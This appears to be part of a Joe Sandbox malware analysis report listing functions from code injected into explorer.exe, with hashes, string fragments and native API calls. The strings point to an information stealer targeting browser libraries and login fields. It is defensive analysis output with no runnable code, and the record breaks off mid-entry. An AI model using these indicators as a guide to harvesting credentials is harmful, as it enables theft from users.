Instruction Fuzzy Hash: C541CF70A18B08CFDB14DF88A8897BE7BE2FB88700F04425ED909D3255DBB59D458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0E7B2AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

n, xrefs: 0E7B2C98
], xrefs: 0E7B2CA8
c, xrefs: 0E7B2C0B
D, xrefs: 0E7B2CDA
[, xrefs: 0E7B2C66
[, xrefs: 0E7B2BF6
[, xrefs: 0E7B2C90
l, xrefs: 0E7B2C35
e, xrefs: 0E7B2CA0
[, xrefs: 0E7B2C2D
l, xrefs: 0E7B2CE2
], xrefs: 0E7B2C3D
b, xrefs: 0E7B2C73
[, xrefs: 0E7B2CCD

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 42dadccf9ed77b2ea4205f59105ab92a03e04e629807e7185f6ed5c6f4f550cd
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: D6C15B70218B099FC758EF64C499BDAF3E1FB98304F404B2E959AC7260DF70A955CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0E7B2F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 0E7B2FA8
c, xrefs: 0E7B2FC8
0, xrefs: 0E7B2F5B
r, xrefs: 0E7B2F88
r, xrefs: 0E7B2F90
r, xrefs: 0E7B2FB0
r, xrefs: 0E7B2F98
r, xrefs: 0E7B2FB8
r, xrefs: 0E7B2FC0
n, xrefs: 0E7B2F6B
r, xrefs: 0E7B2FA0
., xrefs: 0E7B2F63

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 2252ae29caeed4bdf99ae9ad3bceaf978aefc00a117e1dc420473df3afaf46f9
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: E051D3306187488FD719DF18D8853EAB7E5FB85300F501A2EE8CBC7252DBB49946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AC2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 0E7AC614
cli., xrefs: 0E7AC327
sspi, xrefs: 0E7AC320
nspr, xrefs: 0E7AC4D4
l, xrefs: 0E7AC4E2
4.dl, xrefs: 0E7AC4DB
opera_browser.dll, xrefs: 0E7AC629
dll, xrefs: 0E7AC32E

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 0149043a90fa0be87f335a499be3c8326e08d25807ffc74179dbffdf06b2fc96
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 67C19F70618A198FC758EF68D459BEAF3E1FB98300F54472D954EC7265DF309E028B86

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AC2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 0E7AC614
cli., xrefs: 0E7AC327
sspi, xrefs: 0E7AC320
nspr, xrefs: 0E7AC4D4
l, xrefs: 0E7AC4E2
4.dl, xrefs: 0E7AC4DB
opera_browser.dll, xrefs: 0E7AC629
dll, xrefs: 0E7AC32E

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: c3239266d3a6aef01d190c8b7b6bbf5f0ee68d7a7399af143d40b07f37a61d53
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: A3C1AF70618A198FC758EF68D459BEAF3E1FB98300F54472D954AC7265DF30AE028B86

Uniqueness

Uniqueness Score: -1.00%

Function 0E7ADCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

name, xrefs: 0E7ADDB2
2, xrefs: 0E7ADDE1
word, xrefs: 0E7ADD9E
UR, xrefs: 0E7ADD5F
User, xrefs: 0E7ADDAB
Pass, xrefs: 0E7ADD97
L: , xrefs: 0E7ADD66

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 3ef7660b3f531778d699f1a14d448050b3446b96962185c0fcf7718932dc317a
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: C1A1B1706187488FDB28EFA8D4447EEB7E2FF98304F40462DE58AD7251EF7099458B89

Uniqueness

Uniqueness Score: -1.00%

Function 0E7ADCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

name, xrefs: 0E7ADDB2
2, xrefs: 0E7ADDE1
word, xrefs: 0E7ADD9E
UR, xrefs: 0E7ADD5F
User, xrefs: 0E7ADDAB
Pass, xrefs: 0E7ADD97
L: , xrefs: 0E7ADD66

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 97acf4e5ec761b59eb1c2c63b4aa35483c1e498ba85a42911ae7e70d28cf94a0
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 17919170A187488FDB28EFA8D4447EEB7E2FF98304F40462DE58AD7251EF7099458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AD352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 0E7AD4A0
e, xrefs: 0E7AD48E
n, xrefs: 0E7AD3E7
, xrefs: 0E7AD47C
., xrefs: 0E7AD3B0

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 8b4df09cdbef512f1d2129058af532f68a21a1f02e065f3889f4f1ef349600f4
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 2F718131618B498FD758EFA8C4887EAB7F1FF98304F00062ED55AC7261EB71D9458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0E7A8C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 0E7A8C97
dll, xrefs: 0E7A8C9E
2.dl, xrefs: 0E7A8C64
shel, xrefs: 0E7A8C90
ole3, xrefs: 0E7A8C5D

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 8f33a27c430d0c49516c16c6cea3efdf290c97f16e2700a2bea74d49334d69ea
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 00513DB0918B4C8BDB64EF64C0457EEB7F1FF58300F404A2E959AE7214EF7095518B89

Uniqueness

Uniqueness Score: -1.00%

Function 0E7A986F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 0E7A99E0
4, xrefs: 0E7A99E9
ion., xrefs: 0E7A98EC
vers, xrefs: 0E7A98E4
dll, xrefs: 0E7A98F4

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 4b19eb0d97dd86a3cb949c1d9b402dd05d86379c7f22e9259a842c95572a3a0b
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: ED417330218B488BCB75EF2898557EAB3E4FBD8305F54462E959EC7250EF30D955C782

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AB4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0E7AB515
user, xrefs: 0E7AB4D3
dll, xrefs: 0E7AB51C
32.d, xrefs: 0E7AB4DA
sspi, xrefs: 0E7AB50E

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: d6381e40539266700f259130660dd43a746590a3571dbc9fd5653184fcdc048b
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 34418131A19E0D8FCB54FF69C0A97ED73E1FB98300F44466AA80ED7220DA71D9408BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0E7A9432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0E7A952A
.dll, xrefs: 0E7A953F
h, xrefs: 0E7A951F
el32, xrefs: 0E7A9537

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: e262b6fb989a5e1efdef172be7243503703635732eea8e5e9ab95d3c0ef28a15
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: B7417170608B498FD7A9DF28D0993AAB7E1FBD8300F144B2E969EC3265DB70C955CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0E7B00B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E7B013D
om:, xrefs: 0E7B0146
Snif, xrefs: 0E7B0154
, xrefs: 0E7B0184

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 8b22f0af6ff82fa0247d833e578b6c80e9f3c8bdc441e94b89fabaebffcdd4b1
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: F331B271518B486FD71AEF28C4887DAB7D4FB94300F504D1EE49BC7261EA30A949CB43

Uniqueness

Uniqueness Score: -1.00%

Function 0E7B00C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E7B013D
om:, xrefs: 0E7B0146
Snif, xrefs: 0E7B0154
, xrefs: 0E7B0184

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 05bceae08f92c70a2d415845227932ef56abe594ed9038c1cc3d9fb5c7bc7a4d
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 12319071518B48AFD71AEF28C4886EAB7D5FB94300F504D1EE59BC7261EA30A9468A43

Uniqueness

Uniqueness Score: -1.00%

Function 0E7ABFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E7ABFFE
chro, xrefs: 0E7AC023
hild, xrefs: 0E7ABFF6
me_c, xrefs: 0E7ABFEE

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: a190999b1366fc477ee03de09f47118c2ff804bb94522e5deca142503eba5777
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 08317270118B084FC785EF689498BAAB7E1FBD8300F844A2D954ECB265DF30CD45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0E7ABFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E7ABFFE
chro, xrefs: 0E7AC023
hild, xrefs: 0E7ABFF6
me_c, xrefs: 0E7ABFEE

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: eff28cf91136f940469aafd0c4e602a3cd268683cfe33146595b0ecbd1698b3a
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 41316171118B088FC795EF689498BAAB7E2FFD8300F944A2D954ACB265DF30CD45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AE8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 0E7AE902
urlmon.dll, xrefs: 0E7AE959
nt: , xrefs: 0E7AE91E
User-Agent: , xrefs: 0E7AE935, 0E7AE948

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: f2f94d3ef6257662bb99d6ddc69ed11e3b7a5ac951a0f8343848137dc32c207e
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 7231E331A14A0D8FCB55EFA8C8887EDB7E1FF98204F44062AD55ED7250EF748A45C78A

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AE8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 0E7AE902
urlmon.dll, xrefs: 0E7AE959
nt: , xrefs: 0E7AE91E
User-Agent: , xrefs: 0E7AE935, 0E7AE948

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 8da5d1dc3e5168418f00bb25d2ce7f819e3cf39b64cbf1b572963185aebd4361
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 9E21F830A10A0D8FCF55EFA8C8487ED7BE1FF58204F44461AD55AD7250EF748A45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AFE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E7AFF03
., xrefs: 0E7AFF1F
t, xrefs: 0E7AFEF4
l, xrefs: 0E7AFF26

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 927783cd278fd33fa0c415b108cba22da36c40f9221b8dc9771db39795f7ca36
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 3C216D70A24A0E9FDB48EFA8D0487EEBAF1FF58304F504A2ED049D3610DB749991CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AFE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E7AFF03
., xrefs: 0E7AFF1F
t, xrefs: 0E7AFEF4
l, xrefs: 0E7AFF26

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: f70a0ccaa175d3b5814243618a270151842a6d190841272c26729ca45839a71c
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 23217F70A24A0E9BDB48EFA8D0487EDBBF1FF58304F504A2ED049D3610DB749951CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0E7AFFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 0E7B0015
logi, xrefs: 0E7B003C
pass, xrefs: 0E7B0022
auth, xrefs: 0E7B002F

Memory Dump Source

Source File: 00000003.00000002.3461297638.000000000E740000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e740000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: f2b6dc3202ca55dbd198501c9880c66ee6a3dd75c722ef5a5d2680eab3ac1885
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 6121CD70624B0D8BCB05DF9998907EEB7E2EF88344F004A19E40AEB254D7B0D9548BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 2504, Parent PID: 4884COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	3.2%
Signature Coverage:	0%
Total number of Nodes:	375
Total number of Limit Nodes:	57

Executed Functions

Function 030DA35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,030D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 030DA3AD

Strings

.z`, xrefs: 030DA39D, 030DA3A8

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: dc5f029e11b9b2ba0c7cf3e940353cbb01a8ed116970807cb8cbdc557ddd31e5
Instruction ID: e1377cdab9ae5cc0d41e5d78d89fe6c1ef6c15dfaeed5a3458af1363b2167ff4
Opcode Fuzzy Hash: dc5f029e11b9b2ba0c7cf3e940353cbb01a8ed116970807cb8cbdc557ddd31e5
Instruction Fuzzy Hash: 5001BBB6201208AFDB44CF88DC95EEB77E9EF8C754F158248FA1DD7240D630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 030DA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,030D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 030DA3AD

Strings

.z`, xrefs: 030DA39D, 030DA3A8

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 94e2d1927cbcccbd238ff26407bed7004c1dcaf612289f870f9449a7549cb6b1
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: A4F0BDB2201208ABCB08CF88DC84EEB77EDEF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 030DA40A Relevance: 1.5, APIs: 1, Instructions: 45
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(030D4D72,5EB65239,FFFFFFFF,030D4A31,?,?,030D4D72,?,030D4A31,FFFFFFFF,5EB65239,030D4D72,?,00000000), ref: 030DA455

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e4601f930e47055c7b02dd82ceee04742a7ddc9202f6d49537b00150c92b3abc
Instruction ID: f4298944b71cb8e0359ff00f65e18c08e917f51b67f0253bebe733eec7610eac
Opcode Fuzzy Hash: e4601f930e47055c7b02dd82ceee04742a7ddc9202f6d49537b00150c92b3abc
Instruction Fuzzy Hash: B6011DB22002086BDB14CF99DC85DDB77ADEF8C754F158248FA5D97241D630E8128BA4

Uniqueness

Uniqueness Score: -1.00%

Function 030DA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(030D4D72,5EB65239,FFFFFFFF,030D4A31,?,?,030D4D72,?,030D4A31,FFFFFFFF,5EB65239,030D4D72,?,00000000), ref: 030DA455

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 716912719fc4fb3a22380c8549e5dcccb20efad74b07cb87f1899da8a90a3cda
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 12F0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 030DA53C Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030C2D11,00002000,00003000,00000004), ref: 030DA579

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e9bfdea51c5e39d2e53a8e8945d382bfb86df0c9cf885ab7c19af68f619f647d
Instruction ID: 3c743e210bc950317c9dfc9632dbb7082e90e18f89a0b8ed98218d4cfa58ab71
Opcode Fuzzy Hash: e9bfdea51c5e39d2e53a8e8945d382bfb86df0c9cf885ab7c19af68f619f647d
Instruction Fuzzy Hash: B5F015B6200208AFCB14DF88DC80EEB77ADEF88654F158548FE099B245C630E910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030DA540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030C2D11,00002000,00003000,00000004), ref: 030DA579

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 88443231abd70ebf2d82c29d7092c5954f7ac3cda3f831c3907f17f350fdb7d2
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 71F015B6200208ABCB14DF89CC80EEB77ADEF88654F158148BE089B241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030DA48A Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(030D4D50,?,?,030D4D50,00000000,FFFFFFFF), ref: 030DA4B5

Memory Dump Source

